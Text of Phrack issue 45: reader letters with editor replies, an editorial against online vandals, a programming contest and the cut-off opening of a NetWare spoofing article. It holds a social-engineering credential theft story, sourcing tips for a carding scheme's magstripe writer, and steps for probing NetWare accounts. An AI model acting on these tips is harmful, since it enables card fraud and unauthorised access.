TimeWasters have released the third version of their cool 'hacker' T-shirt. Because the previous versions were too limited (20 and 25 shirts) we printed no less than 200 shirts this time. Of course you want to know, what does it look like ? On the front, a TimeWasters logo in color. Below that a picture of two hacking dudes, hanging behind their equipment, also featuring a stack of phracks, pizza boxes, beer, kodez, and various computer-related stuff with a 'No WsWietse' sticker. On the back, the original TimeWasters logo with the broken clock. Below it, four original and dead funny real quotes featuring the art of Time Wasting. Wearing this shirt can only provoke one reaction; WOW ! Imagine going up to the helpdesk wearing this shirt and keeping a straight face while asking a security question ! And for just $2 more you'll get a pair of sunglasses with the text 'TimeWasters' on them ! To order: Send $20 or $22 to TimeWasters Postbus 402 5611 AK Eindhoven The Netherlands, Europe This includes shipping. Please allow some time for delivery. If you are in Holland, don't send US$, email the address below for the price in guilders and our 'postbank' number. For more information: email to: - timewasters-request@win.tue.nl with subject: T-SHIRT for a txtfile with more info. - rob@hacktic.nl or gigawalt@win.tue.nl for questions. [I've got one Time Wasters shirt...Now I'm gonna have to get another. Wonder if they'll trade...I know this guy who makes some damn cool shirts... but the glasses are the clincher. I'm ordering now.] ------------------------------------------------------------------------------ ==Phrack Magazine== Volume Five, Issue Forty-Five, File 3 of 28 **************************************************************************** Phrack Loopback Part II How sad the state of affairs is. Companies do _not_ care about security. My father would be the last one to think about ways into the "systems" that are out there. We had a good talk tonite about the lack of security in the corporate world. I told him about PGP public key encryption software, and it's political gibberish etc. Then he hits me with this outstanding story of the stupidity displayed at his credit union (AEA, yes he works in the silicon valley). He went to get some $$ at the branch office near his work, and he notices they have upgraded their computer systems. It was apparent that it was no 'internal' updating of the tellers' equipment, but a major overhaul of the entire structure at AEA credit union. This was obvious when every teller was reading manuals as they helped customers. The greatest part of his story (which made him laugh out loud) was that on the tellers' computer screens were taped up pieces of paper detailing how to access the computers at AEA. As the teller was in the back room, my dad leaned over and saw what it was, and memorized the things. Its the things like that which make me want to trust my money to fabulous behemoths like credit unions. [That's typical. You should have gone straight to that bank and taken notes. You never know...you could have ended up with SWIFT access. Let's face it, if the BND's Project Rahab can, so can we.] ------------------------------------------------------------------------------ TO: The Hack/Phreak Community From: Amitech USA Subject: Explaining About What Amitech USA IS! Amitech is a group that teaches and learns... What I mean by this is The Hack/Phreak community should teach the inexperienced more than put them down, especially if they want to learn but no one is willing to teach them.. This is were we come in... The definition of Hacking is learning the holes in different telephone equipment and different computer equipment. People these days don't use there knowledge correctly... They abuse what they get and sometimes even harass people because of hatred and reasons of revenge.. The H/P community isn't about this... We are releasing this to invite anyone in the H/P community with a lot or little experience to join us, to learn and to teach us.. Amitech USA does not condone any board crashing, harassing, Underground Board password stealing etc. We will not be responsible or accept anyone who condones such activity.... Amitech has two levels of members.. 1. Trial members 2. Regular members. The trial members are on a basis of two weeks which in such time they have to show us that they are willing to learn and is not into the group just to use the groups name in there signature. Members decide who is acceptable for a group and who is not. Each member will get the users application except their real name and phone #. We will decide and will contact you within a week of when the application comes to me... We are going to be mostly underground for the simple fact that the group does not need recognition. Are members may stand out but for the most part we will not be shown and or do not want to be shown for the simple fact that underground is better for the newer user as will as the older users. Please send all applications to Either burntkid@spiff.gnu.ai.mit.edu or The Crime Scene 516-873-8903...Anyone who wants information may send a message. Anyone interested in joining please fill out the application below. First Name: Handle: Phone #: How many years experience: Specialties: Boards you're on: Email/Internet: Please Spread This Message Around... [Good luck with your group. And remember, when you're a group, you're subject to prosecution under RICO. God Bless America.] ------------------------------------------------------------------------------ Dear Phrack: I know you guys take an interest in what happens at 2600 meetings, so I thought you might like to hear about a mainstay of the Washington D.C. meeting. BTW, I am also submitting to 2600. (They should have a PGP key) ------ Cut ---- For the past few meetings a guy from MCI has showed up. He works at some sort of Pentagon City mall branch of MCI and on the Fridays he sticks around and gets drunk. He is usually a great source of entertainment and this time he was undoubtedly the best part of the 2600 meeting. That was the highest form of entertainment (except for the threats on The Monk's life). At a meeting before this he was saying (I'm not sure how many beers he had had) how he was going to bomb (physically) all the hackers computers by using the system batteries. And he also said something like "We didn't have time for this kind of stuff in Vietnam." Anyway, I was listening to his drunken ramblings and I was thinking "I should be writing his wisdom down." So I did, and Maverick later started to type it down. The hardest part of all of this was not laughing in his face. Here is where I started the notes: MCI Guy: I mean it's really small, it's only like 1 microliter long. Vance: Yeah, that's pretty short. MCI Guy: I work on computers and they go in nanoseconds. Vance: Nanoseconds are really short. MCI Guy: A nanosecond is about this long. < Denotes with his fingers a length of about 6 inches > Vance: That's great if you can visualize it. MCI Guy: Yeah, it's short. Most of the instructions that I do take less than 3 nanoseconds, and that's short. But it's still too slow. --- Ok, from here it somehow jumped to a discussion of Rebel Lion's modem that was sitting out: MCI Guy: That's a good modem, it has memory because of it's external capacitance. The capacitor can store the memory since it's outside. Vance: Yeah, it must have a lot of memory. How much would you say? MCI Guy: A lot, gigabytes of it. The computer can talk directly to it. Vance: You need software to access that, that's where the intelligence is, in 2 gigabyte capacitor technology software. MCI Guy: It's because it's outside and it has it's memory. Vance: Gigaboobs of memory. Megamammaries. It must have Megamammaries in it's external capacitance. -- At this point, everybody is cracking up, I can't believe Vance kept a straight face. MCI Guy: Yeah. < Looking confused. > ------------------------------------------------------------------------- -- After this, I was really laughing and wasn't sure of exactly what was said. But in just a few minutes, the MCI guy left to get some more beer. He didn't come back to our table, he went to another one. We ignored him for awhile. But as he was sitting there, a woman sat down next to him. She was undoubtedly a prostitute, and there were many cracks about her gigaboobs and megamammaries. She must have spotted the fact that he was wasted and was trying to make some easy cash. After a while, the MCI guy didn't bite, and her pimp came along and picked her up. (There is no other logical explanation that I can think of.) After a few minutes, we went back to the table for the final round, but Vance had left, so I conducted the search for knowledge. It starts as I was approaching the table and trying to get him to talk to me. GD: When you were talking Rebel Lion's modem, I wasn't quite sure of what you said, could you explain it to me? < I get out my pencil and paper, like I'm taking notes on his every word. (Actually I was) > MCI Guy: < He is giving me a look of utter contempt, like I'm just a stupid kid who is not worthy to partake in his knowledge > Well you see it's external. GD: What do you mean? It's obviously external, but what does that mean? < Gives me another look > --- Maverick accidentally spills some of Mr. MCI's beer. MCI Guy: What was that? What are you doing?!? Maverick: I didn't do anything, you spilled it! MCI Guy: < Just forgets about it in his drunken stupor > It has it's own memory, it doesn't have to take up the core like an internal. GD: Core? MCI Guy: Or something like that, you know. It's outside the main frame. GD: Right, so it saves memory. MCI Guy: Hmmph, I work with so much memory. I throw out tapes. GD: Tapes? You mean tape backups. MCI Guy: Yeah. GD: Why? Don't you want the memory? MCI Guy: I have too much memory. GD: Yeah, I guess you're right, if you have too much memory, it is hard to get rid of. MCI Guy: I even use records. GD: You mean like the spinning kind of records? On a turntable? MCI Guy: Yeah, they hold a lot of memory. GD: Why don't you use CD's? They hold a lot more you know. MCI Guy: No they don't, you don't even know. GD: So you are saying that records hold more than CD's? MCI Guy: Yeah, and I can save space on records, I use "shrinker". It shrinks the space on a record. GD: You mean shrink the space on one of those spinning records? < I was trying too hard to keep from laughing to speak articulately > MCI Guy: It saves space by shrinking everything, and I can fit more on it. GD: Yeah, I guess that is a good idea. MCI Guy: < Incredulous at my stupidity > Do you even know about comp? GD: Comp? Sorry, I've never heard of "comp". What is it? MCI Guy: It's bits and bytes. GD: Keep on going, I want to learn about this. < And boy did I > MCI Guy: 4 bytes make a bit, 2 bytes make a double word, 2 words make a double word. GD: 2 words make a double word? Isn't that obvious since 2 means double? MCI Guy: < Ignoring me > It's called 32 bits. Above that you have to deal with 36 bits. GD: Ok, I get it. That's pretty cool. MCI Guy: That's called the IBM logo. GD: The IBM logo? It's made up of bits and bytes and comp? MCI Guy: Yeah, if you go above or below the line. --- Ok, at this point I was reeling from the bit-byte-word conversions and I didn't even want to try pursuing the "line" question since I had to leave. I really wish I could have stayed, but I also don't know how long he would have been benign; this guy was drunk and still had 2 large beers in front of him. All through this time, people were cracking up and laughing in his face. It wasn't that hard for the guy currently talking to him to not laugh, but when you thought for a second about this guy's slurred speech and his look of superiority, it was damn hard not to laugh. And how sad is this guys life? He comes to a mall to get drunk! It must cost him $15 for those beers. Oh well, maybe we will spring for some grain alcohol next time so we can get him to say even more. Last thing, if you are talking to a guy like this. Don't do what I did, don't confront him. You won't get as much out of him. Do what Vance did; agree with everything he says. This will get him more comfortable and he will talk more. Then give a summary of everything he said, while inserting things like "megamammaries" and "gigaboobs". -- Disclaimer: I tried to be as accurate as possible but there were some small changes made because I couldn't remember the exact wording. But overall this is fairly true to life. [I've noticed that everyone I've ever met involved with LE or security at corporations drinks and drinks and drinks and drinks. And drinks. What's with that? Jesus...no wonder they are so slow to react. They are fucking hammered all the time. They need to invest in some stimulants. Swap that Gin & Tonic for a handful of Ephedrine or something. (Notice I said Ephedrine...gotta stay legal, eh?) ] ------------------------------------------------------------------------------ Dear Phrack, I am Knightkrawler. About a month ago Mephisto, a fellow hacker friend of mine, discovered a dialup for a Taco Bell computer while scanning some numbers. Just for the hell of it, I called up the Taco Bell manager and posed as the Sys Admin. THE PHUCKER FELL FOR IT!!!!!! Conversation ^^^^^^^^^^^^ me: Hi, I'm the SYS Admin for The Taco Bell Login. My staff and I will be running some routine diagnostics for the next week. I'll need a passwd and login name to enter the system. Corey (the manager): Sure! My passwd is 1A2B3C, and my login name is Corey. me: Thank you. If you need anything, you know where to reach me. END ^^^ WHAT A DUMBASS!!! I was able to log on and Change fuckin' payrolls!!!! First thing I did was to change the price of tacos to 5 cents a piece! What I want to know is, have any of you out there had any similar experiences with bastards like these? Are all restaurant managers so lame? L8R, -=KnIgHtKrAwLeR=- [The Taco Bell SCO's have been a source of amusement for some time. It would appear that all restaurants in the PepsiCo chain have SCO's in-house. Something to keep in mind. And, uh, I've never seen anything that you could do like "change prices" without special terminal emulation. So, uh, don't bullshit a bullshitter. But, hey, it's a funny hack, and there are several in every city to play with, if you are so inclined.] ------------------------------------------------------------------------------ Hello there, I was wondering if you could help me (wait, wait, hear me out!). I am looking for some up-to-date info on COSMOS. I've read all of the Phrack articles, yours in ish 31 was particularly good, and I was wondering if there have been any developments lately that I should be aware of? Basically, I am looking for a manual that will show me how to use COSMOS. Kind of like a DOS reference guide or something similar. Your article was dated 1990, almost 4 years ago, and I'm sure there have been some new things introduced since then. I was thinking that if you had the raw info, you could pass it along to me and I could whip up a readable format for the next issue of Phrack. Believe me, I've got far too much time on my hands. I love Phrack and would do anything to help out! Anyway, I'll cut this off here before I waste too much of your time. Mr. Wizard [COSMOS is being phased out. I would suggest you look for info on SWITCH. There have been some articles on it in 2600, so you may want to check some back issues. Otherwise, I'll see if I can't get some more detailed articles on its use for future Phrack issues. But as far as COSMOS goes, I think my article from a few years back ended up as the most complete ever done, so I doubt there are any others that covered things I didn't.] ------------------------------------------------------------------------------ VIRTUAL REALITY NOW AVAILABLE TO GENERAL PUBLIC AT CYBERMIND What is Virtual Reality? Virtual Reality (VR) is a computer generated, interactive 3D environment in which the computer serves as a window to an alternate reality. Once immersed in this environment, the players interact with each other as well as the computer. Each VR system includes a head mounted display which provides a 3D graphical image along with full stereo sound. By placing the display over your eyes, you are "virtually" transported to a computer-generated world that you control. Wherever you move, the computer tracks the movement of your body and displays the appropriate image to your eyes. (If you looked up you would see the sky. If you looked down you would see your "feet.") The unlimited choices you can make in these virtual worlds make the experience one-of-a-kind. Development of Virtual Reality: Past and Future Early VR was confined to multi-million dollar systems in research labs and military simulations. However, the decreasing cost of computing power and display technology, VR now has more widespread applications: entertainment, education, worker training, telerobotics, medicine, teledildonics (virtual sex) and communication, among others. In the future, VR technology will allow you to travel, shake hands with people in other countries, walk on the moon or go shopping -- all without actually leaving the home or office. What is CyberMind? CyberMind is San Francisco's first location-based virtual reality entertainment center. CyberMind center features eight interactive virtual reality machines that allow the general public to experience and learn about 3D virtual reality technology by playing imaginative, roleplaying games such as Dactyl Nightmare, Legend Quest, Flying Aces and ExoRex II. CyberMind Virtual Reality Center WHAT: Out of this world entertainment for families, couples, singles and groups. WHERE: One Embarcadero, Lobby Level (second floor). At the top of the escalators. WHEN: Normal Center Hours are 10:00 am to Midnight, seven days a week. HOW MUCH: Normal Pricing is $5.00 per play per person for a six minute experience. 20% discount for groups over 12 persons. CYBERMIND CENTER RENTALS: For catered parties and receptions, contact Chris Figge at 415.693.0861 WHY: It will blow your mind CyberMind Corp: Telephone 415.693.0861. FAX: 415.693.0171. 737 Pine Street, Suite 65, San Francisco, CA 94108 [Uh, yeah. And Stand in line with Beavis & Butthead. Huh Huh, Cyber Stuff is cool. Heh heh. Cool. Yeah, I'm a Cyberpunk with $5 dollars. Let's set it on fire and throw it in the street. No, Ass Munch, you can get stuff with money. Oh yeah, heh heh heh.] ------------------------------------------------------------------------------ Phrack: Sorry to inconvenience you and PGP this message, but I fail to trust the people in charge of the server in which this message is being sent from. Approximately six months ago I was playing around with the idea for a crypto-chat program. In short: You and the other people in the chat area, (IRC for example), would pick the same password or random seed number. This would tell the chat program what algorithms to use, etc. Hence forth whatever you type is encrypted and whatever is displayed remotely is automatically decrypted. My only problem is that I do not know enough regarding cryptology to write a very secure encryption routine. I have tried a few times to contact Cypherpunks, but to no avail, I have not received any letters back from them even regarding my request to be put on their mailing list. I write to you, Phrack, in hopes that you can set me in the correct direction for making my crypto-chat program a reality. I feel it would be an asset to the hack/phreak community and its struggle for more privacy. Thanx. -----------------------------------------guerilla AnArchy--------------------- [Actually, it wouldn't be that hard to do, but you'd probably want to do it as a DCC chat type thing, rather than going through a server at all. I may be wrong, but I think someone may have worked on such a beast. You may want to try again to contact the cypherpunks list (cypherpunks@toad.com) (or to get added, cypherpunks-request@toad.com) and ask around. Otherwise, use the existing DCC Chat source, but just change it to incorporate a public key exchange, and use those exchanged keys to encrypt messages. It would be harder for more than one to one chat, but hell...no pain, no gain. Notice, I didn't volunteer to do it. Much too much work for me.] ------------------------------------------------------------------------------ Dear Phrack, Just finished reading Issue #42 (so I'm a little behind). Must say, it was very kewl. I have a little addition to the "Car Light Hack" in the Loopback section. When coming up to an intersection with the pressure sensitive panels in the tar, pump the brakes hard so the car rocks back and forth. This will fool the panel into thinking there's more weight (more cars) sitting on it and it will change the light faster. This also works great with intersections where there are two panels--one at the light, and one six or seven car lengths back. Either way, the light is guaranteed to change green quickly! [Yes. Pressure pads are quiet common. Probably much more so than the light sensors. Whatever works.] ------------------------------------------------------------------------------ Hi there ! Last week I got in contact with your magazine (#44) and a soft called Bluebeep, because I wanted to call BBSs all over the world. Reading Phrack, I got more interested is hacking stuff, which I do since I first touched a computer when I was 9 (now I'm 20). So, since you offered in the magazine :), I'd like to get some info about the subject, specially about free callings. Here is the story. Here in Brazil most of the computers have been IBM mainframes for a long time, only now changing to UNIX & LANs. Phone lines were a shit too, I could say that batter than most since my father works for the Brazilian phone co. (Embratel) And that's my point. Brazilian phone co. is (still) owned by the federal government. NEC and AT&T are trying to end the monopoly. But I think it's much easier to hack it since there aren't many hackers here and they don't do a big mess. What should I do and have to try this. See, I'm very rookie, so would like some guidelines... People here is very afraid to talk about. BTW, could a AT&T guy bust me (here, in Rio de Janeiro) for using Bluebeep in the 000-8010 ?!? Are there other means of doing free calls ? Embratel has it's own Calling Card... Wish I can have your help... I'm a RPG-fanatic and would like to connect to Illuminati BBS and others, so I could get more info. Thanx, []s CAD [I wouldn't worry as much about the AT&T guy busting you, as I would the Brazilian Secret Police shooting you for boxing. I mean, if the government still owns the phone company, they are the ones to watch out for. To contact Steve Jackson Games and the Illuminati BBS, you should think about signing on to io.com. That is their Internet site. It's very cool, and has a huge MUD, (if you are into those sort of things.) Good luck in Brazil, and please consider doing a file for our International Scene section on your Country!] ------------------------------------------------------------------------------ - Translation by MIND-NRG (Rome, Italy) [All words between [] are additional comments made by the translator] Speciale Cyber September, 1993 ~~~~~~~~~~~~~~ by Sergio Stingo (King) [ A good italian magazine ] (P. 131) CyberPunk: everbody is talking about it, but only few people really know what it really is. Electronic Books ? A disturbing view of the next future ? Electronical conferences ? A new sort of fashion-wears ? The biggest democratic revolution of our age ? A silent and creeping revolution ? Our Stingo [perhaps a male journalist ?], always curious about everything that is <>, is travelling around Italy to investigate about this phenomenon. It was like taking the lid off a brewing pot. The more He met <> the more He understood that there was much more to be discovered; from the supporter of the <>, who is testing the mysterious machine into discos and universities, to the first art gallery where hackers' work of art are exhibited; from the cyber magazines, as <>, to the bands that are discovering a new style of music. Not mentioning sex, that, thanks to technology, is trying to increase the range of possible sensations. So, the trip beyond the borders of the universe was so rich and adventurous, that We have had to divide this articles into two issues. In this issue We introduce you to the first one. And, as cybernauts are used to say, have a good navigation. [ This is the translation for you boys interested into this article. Have a good time with it .CyberPunks are unknown in Italy. It's possible to find poor articles on them, but no serious issues.] - MIND-NRG - [Hey Man! Thanks for the translation! I was wondering what that King Magazine article was saying. Hehe, I ought to get you to translate the whole article! Haha...Spanish I could do myself, but Italian is a little too different. BTW: We don't have an article on the Italian Hacking scene either. Obviously you guys have developed quite a subculture. We'd really like to hear more!] ------------------------------------------------------------------------------ This message is in regard to the following article in Phrack #42. I was just wondering if there was a way to convert the newer sportsters. My modem does have 4.1 roms, at least that is what ati6 displays. however my modem has problems with the second line of command: "Turning your USR Sportster w/ 4.1 roms into a 16.8K HST Dual Standard" by The Sausage with The Mallet If you have a USRobotics Sportster FAX modem, Ver 4.1, you can issue the following commands to it to turn it into an HST 16.8K dual standard. In effect, you add HST 16.8K to its V32.bis 14.4k capability. ats11=40v1L3x4&h1&r2&b1e1b1&m4&a3&k3 atgw03c6,22gw05cd,2f ats14=1s24=150s26=1s32=8s34=0x7&w I would appreciate it if you could somehow forward the message to either the authors. I realize that this is an old article, but I would really appreciate any reply to this question. Sincerely, Sam F. [Wow. I have no idea. I do know that later versions of the modem took out that, uh, "Feature." But keep in mind, as modems progress they big feature that everyone wants is flash eprom for the software, so that you can upgrade the modem through software. The future holds a lot of fun for the person who gets his or her hands upon the reprogramming tool and rom images of upgrades for faster modems.] ------------------------------------------------------------------------------ Phrack: I would like first to express all my gratitude to you, the Phrack editor, and to all of its contributors. You are doing a great job and should get credit for it. What really kills me are those wanna-be hackers writing you in an often offensive manner, requesting for information that no real hacker would expect to see in Phrack. Or those sending the /etc/passwd file of their local University and thinking they've achieved the hack of the century. I've been reading Phrack for quite long time now and was wondering how to contribute to it, considering that almost every hackable subject has been covered in one of the 44 Phrack issues. I saw in issue 42 that you were sort of interested to collect H/P field information from countries other than United States. And I thought it might be an opportunity for me to send you something that was uncovered before. I'm quite sure that you can easily find foreign contributors for European countries so I will probably not bother you with H/P-related data in France and Sweden (where I used to live). Few months ago, I settled in the Asian country you'll identify from my e-mail address and have started investigating, in a relaxed mode, hacking and phreaking areas. This country is a virgin territory and maybe my researches and experiments would provide guidelines for H/P-ers in the same lonely situation. I was wondering though if you had any kind of recommendations for such reports (style, length, depth of details to be given, etc...) If anybody in the Far-East area is interested to participate in the writing of the report, or just willing to share knowledge with me, please feel free to forward my e-mail address to such people. Disclaimer: Even if I really have the intention to write such a report, no warranty should be made upon the delivery time of it. My job is time-consuming and leave me very few time for investigations. Apart from that, life in this country is also highly entertaining and week-ends are mostly spent on parties with nice, nice people. ~~ Long live Phrack and its famous skilled contributors. ~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -- Otto Sync -- [Thanks for the letter of appreciation! As far as contributions go, we are interested in anything and everything. For your scene file, just use some of the files on other countries as examples, and I'm sure yours will be fine. Don't worry about getting it to me in any hurry. Phrack 46 is 3 months away. :) ] ------------------------------------------------------------------------------ Hey, guyz! What happened to the magazine, I haven't seen any number after 43... In any case, send the stuff to me, as soon as possible. Preferably in some kind of compressed format. I have got here a small question. Firstly, I noticed that a number of hackers have E-Mail addresses such as *@phantom.com. Is it possible to get one just like this, or you've gotta be some kind of a masquotte? I myself am a god-fearing character, not hacking outside my own domain. I prefer to produce than to steal. However, I lack chatting and I lack money, but I wouldn't steal it. Just to get a different view - for you. Not every curious person has to be a criminal. Greetings, Verdura (aka Vegetable) [Phantom Access is a public access unix that you can get access to just by telnetting to phantom.com and applying as a new user. Yes, indeed, there are a lot of hackers on phantom.com. In fact, a large number of us ancient LOD types are on there. More than you would imagine, really. But it is open to the public, and anyone who cares to pay the usage fees can hang out. As far as back issues, I don't send them out to anyone. They are available for ftp from ftp.netsys.com in /pub/phrack as .zip files. I do make exceptions for people without ftp access, and will mail (US Mail) disks to whoever sends me postage to: Phrack Magazine 603 W. 13th #1A-278 Austin, TX 78701 ] ------------------------------------------------------------------------------ Dear phrack type person: I am working on a carding scheme involving stripe-writers. I have looked into getting one but it seems impossible to find someone to sell me one! I know publishing information like that is VERY stupid seeing as many government officials read phrack without paying for it. And many lamer asswipes read it to. That company would stop selling faster than a lamer on IRC gets kicked! I need any information on acquiring such a PERFECTLY LEGAL device because of the places I tried I could not find one that would sell me one! I also need any tips on magstipe encoding and atm machines available. I am adept in the circles of phreekdom and can call Boards if need be. And by the way this board I am mailing from has a dickhead for a sysop. I would mail from the public access internet site here, but They found my uid shells and kicked me off. They called the cops but being the most advanced police force in the nation they haven't a clue how to contact me. (the system only asks for you name to get an account) But now they require picture ID to get an account. It's a bitch but I have to get a fake ID and a fake parent. I was also attempting to DL cracker jack when They kicked me off and I would like to know were I could gopher for it or ftp if need be. I lost most internet access except gopher and mail from this crap board. ENCRYPT EVERYTHING cause the sysop sux. I would like to subscribe to phrack but this bastard would delete 1 meg of mail quite quickly unless it is small, zipped and uuencoded I guess. Well anyway I hope to hear from you. The government can have my encryption keys when they pry them from my cold dead hands. -Phiber Phreak [It's pretty hard to get such a magstripe writer, but the keyword here is MONEY. If you have money, they will sell you damn near anything. You may want to check Bank Technology News (800-835-8403 for subscription) as they have periodic vendor lists. Additionally you can ask them for a copy of their Card Industry Directory which will have all the info on suppliers that you could ever dream of. It has a 15 day trial period too, so read it, get what you need and return it (for a full refund). As far as Cracker Jack goes, get on #hack sometime and ask. I don't have a copy, but i imagine someone online will be able to DCC it to you.] ------------------------------------------------------------------------------ ==Phrack Magazine== Volume Five, Issue Forty-Five, File 3a of 28 **************************************************************************** I try my best to keep Phrack unbiased. For those of you who know me, you know that I am not the most soft-spoken individual in the world, and not being able to totally flame everyone and everything puts a great deal of stress on me. This editorial space is my one saving grace. In this I can spew out incredible amounts of crap and everyone should know that it is MY OPINION only. If anyone else wants to write a "guest" editorial, feel free to email it to phrack@well.com. --------------------- This issue I'm going to rant and rave about assholes on the net. You know who you are. You break into sites without any purpose, you delete files, you harass and annoy, you attempt blackmail, you fake mail, you fake news, you sling racial insults and you generally have nothing to offer the world. You are a disgrace to the hacker community. -------------------- There have always been confrontations online. It's unavoidable on the net, as it is in life, to avoid unpleasantness. However, on the net the behavior is far more pronounced since it effects a much greater response from the limited online environments than it would in the real world. People behind such behavior in the real world can be dealt with or avoided, but online they cannot. In the real world, annoying people don't impersonate you in national forums. In the real world, annoying people don't walk into your room and go through your desk and run through the town showing everyone your private papers or possessions. In the real world, people can't readily imitate your handwriting or voice and insult your friends and family by letter or telephone. In the real world people don't rob or vandalize and leave your fingerprints behind. The Internet is not the real world. All of the above continually happens on the Internet, and there is little anyone can do to stop it. The perpetrators know full well how impervious they are to retribution, since the only people who can put their activities to a complete halt are reluctant to open cases against computer criminals due to the complex nature of the crimes. The Internet still clings to the anarchy of the Arpanet that spawned it, and many people would love for the status quo to remain. However, the actions of a few miscreants will force lasting changes on the net as a whole. The wanton destruction of sites, the petty forgeries, the needless breakins and the poor blackmail attempts do not go unnoticed by the authorities. I personally could care less what people do on the net. I know it is fantasyland. I know it exists only in our minds, and should not have any long lasting effect in the real world. Unfortunately, as the net's presence grows larger and larger, and the world begins to accept it as an entity in and of itself, it will be harder to convince those inexperienced users that the net is not real. I have always played by certain rules and they have worked well for me in the nearly 15 years I've been online. These rules can best be summed up by the following quote, "We are taught to love all our neighbors. Be courteous. Be peaceful. But if someone lays his hands on you, send them to the cemetery." The moment someone crosses the line, and interferes with my well-being in any setting (even one that is arguably unreal such as the Internet) I will do whatever necessary to ensure that I can once again go about minding my own business unmolested. I am not alone in this feeling. There are hundreds of net-loving anarchists who don't want the extra attention and bad press brought to our little fantasyland by people who never learned how to play well as children. Even these diehard anti-authoritatians are finding themselves caught in a serious quandary: do they do nothing and suffer attacks, or do they make the phone call to Washington and try to get the situation resolved? Many people cannot afford the risk of striking back electronically, as some people may suggest. Other people do not have the skill set needed to orchestrate an all out electronic assault against an unknown, even if they pay no heed to the legal risk. Even so, should anyone attempt such retribution electronically, the assailant will merely move to a new site and begin anew. People do not like to deal with police. No one LOVES to call up their local law enforcement office and have a nice chat. Almost everyone feels somewhat nervous dealing with these figures knowing that they may just as well decide to turn their focus on you rather than the people causing problems. Even if you live your life crime-free, there is always that underlying nervousness; even in the real world. However, begin an assault directed against any individual, and I guarantee he or she will overcome such feelings and make the needed phone call. It isn't the "hacking" per se that will cause anyone's downfall nor bring about governmental regulation of the net, but the unchecked attitudes and gross disregard for human dignity that runs rampant online. What good can come from any of this? Surely people will regain the freedom to go about their business, but what of the added governmental attentions? Electronic Anti-Stalking Laws? Electronic Trespass? Electronic Forgery? False Electronic Indentification? Electronic Shoplifting? Electronic Burglary? Electronic Assault? Electronic Loitering? Illegal Packet Sniffing equated as Illegal Wiretaps? The potential for new legislation is immense. As the networks further permeate our real lives, the continual unacceptable behavior and following public outcry in that setting will force the ruling bodies to draft such laws. And who will enforce these laws? And who will watch the watchmen? Oftimes these issues are left to resolve themselves after the laws have passed. Is this the future we want? One of increased legislation and governmental regulation? With the development of the supposed National Information Super-Highway, the tools will be in place for a new body to continually monitor traffic for suspect activity and uphold any newly passed legislation. Do not think that the ruling forces have not considered that potential. We are all in a serious Catch-22, brought about by a handful of sociopaths. When an unwanted future arises as a direct, or indirect, result of their actions, REMEMBER. ==Phrack Magazine== Volume Five, Issue Forty-Five, File 4 of 28 // // /\ // ==== // // //\\ // ==== ==== // // \\/ ==== /\ // // \\ // /=== ==== //\\ // // // // \=\ ==== // \\/ \\ // // ===/ ==== PART I ------------------------------------------------------------------------------ !! NEW PHRACK CONTEST !! Phrack Magazine is sponsoring a programming contest open to anyone who wishes to enter. Write the Next Internet Worm! Write the world's best X Windows wardialer! Code something that makes COPS & SATAN look like high school Introduction to Computing assignments. Make the OKI 1150 a scanning, tracking, vampire- phone. Write an NLM! Write a TSR! Write a stupid game! It doesn't matter what you write, or what computer it's for! It only matters that you enter! Win from the following prizes: Computer Hardware & Peripherals System Software Complete Compiler packages CD-ROMS T-Shirts Magazine Subscriptions and MANY MORE! STOP CRACKING PASSWORDS AND DO SOMETHING WITH YOUR LIFE! Enter the PHRACK PROGRAMMING CONTEST! The rules are very simple: 1) All programs must be original works. No submissions of previously copyrighted materials or works prepared by third parties will be judged. 2) All entries must be sent in as source code only. Any programming language is acceptable. Programs must compile and run without any modifications needed by the judges. If programs are specific to certain platforms, please designate that platform. If special hardware is needed, please specify what hardware is required. If include libraries are needed, they should be submitted in addition to the main program. 3) No virii accepted. An exception may be made for such programs that are developed for operating systems other than AMIGA/Dos, System 7, MS-DOS (or variants), or OS/2. Suitable exceptions could be, but are not limited to, UNIX (any variant), VMS or MVS. 4) Entries may be submitted via email or magnetic media. Email should be directed to phrack@well.com. Tapes, Diskettes or other storage media should be sent to Phrack Magazine 603 W. 13th #1A-278 Austin, TX 78701 5) Programs will be judged by a panel of judges based on programming skill displayed, originality, usability, user interface, documentation, and creativity. 6) Phrack Magazine will make no claims to the works submitted, and the rights to the software are understood to be retained by the program author. However, by entering, the Author thereby grants Phrack Magazine permission to reprint the program source code in future issues. 7) All Entries must be received by 12-31-94. Prizes to be awarded by 3-1-95. -------------------------INCLUDE THIS FORM WITH ENTRY------------------------- Author: Email Address: Mailing Address: Program Name: Description: Hardware & Software Platform(s) Developed For: Special Equipment Needed (modem, ethernet cards, sound cards, etc): Other Comments: ------------------------------------------------------------------------------ Novell NetWare & Ethernet address spoofing with ODI --------------------------------------------------- Just to save you from the boredom of Yet Another UNIX Security Weakness, here are some things to consider about Novell NetWare for your next Security Audit or Hacking session (depending on which side you are on). Novell claim to have over 20 million PCs using their network operating system, substantially more than the estimated 4 million TCP/IP systems worldwide. There are many reasons for its popularity and its 60 to 80% market share, one of which has been its relatively good security. NetWare has been one of the few widely available systems which offer some form of login encryption of accounts and passwords over the wire, as standard, unlike most of its rivals which send them out as plaintext, even if they are stored in an encrypted form eventually. Novell now offer RSA based public key encryption of the data as well. However, since it is so popular, there are likely to be plenty of systems out there which have not been upgraded to the latest versions and patch releases and which may be still be vulnerable to programs like KNOCK , the patched ATTACH command (published in HackTic 16/17 1992), or the University of Leiden's HACK (which has been published in issue 43 of PHRACK) Since the latest security features are implemented as NetWare Loadable Modules for NetWare 3x and 4x, but as Value Added Processes for NetWare 2x, which require the server to be brought down to install them, it is likely that there are many NetWare 2x systems which are still vulnerable I shall also assume that you are not on one of those wide open "box shift" installations where none of the security features have been switched on (try logging in as SUPERVISOR or GUEST without a password), all the programs and data are in a single SYS: volume and the Network Address of the cable is the default 00000001. Like any project, the more you know about your particular Novell LAN, the easier it gets to "explore". Login as GUEST or a normal account. Try to see who else is on the system e.g. USERLIST /A >c:\ulist.txt will give you a list of users currently logged in, with their Ethernet card addresses saved to a text file . Your current connection will be marked with an asterisk. If your system has 100 or more users, then any sane Supervisor will have used some form of logic when allocating the user's login accounts, probably based on personnel or id number, often including their initials. SYSCON with privilege is what you are aiming to be able to use, but even without any privileges, you can still use it to look at your own account, change your password etc. You can also see a list of all the other registered users. This should help you sort the accounts into normal and privileged accounts (obviously SUPERVISOR, but often there are SUPERVISOR equivalent accounts, or Work Group Manager accounts which stand out from the list). You are quite likely to see an account called something like TAPE_BACKUP or DATA_LOGGER, TRAINER, STUDENT1, STUDENT2 i.e. accounts which do not belong to 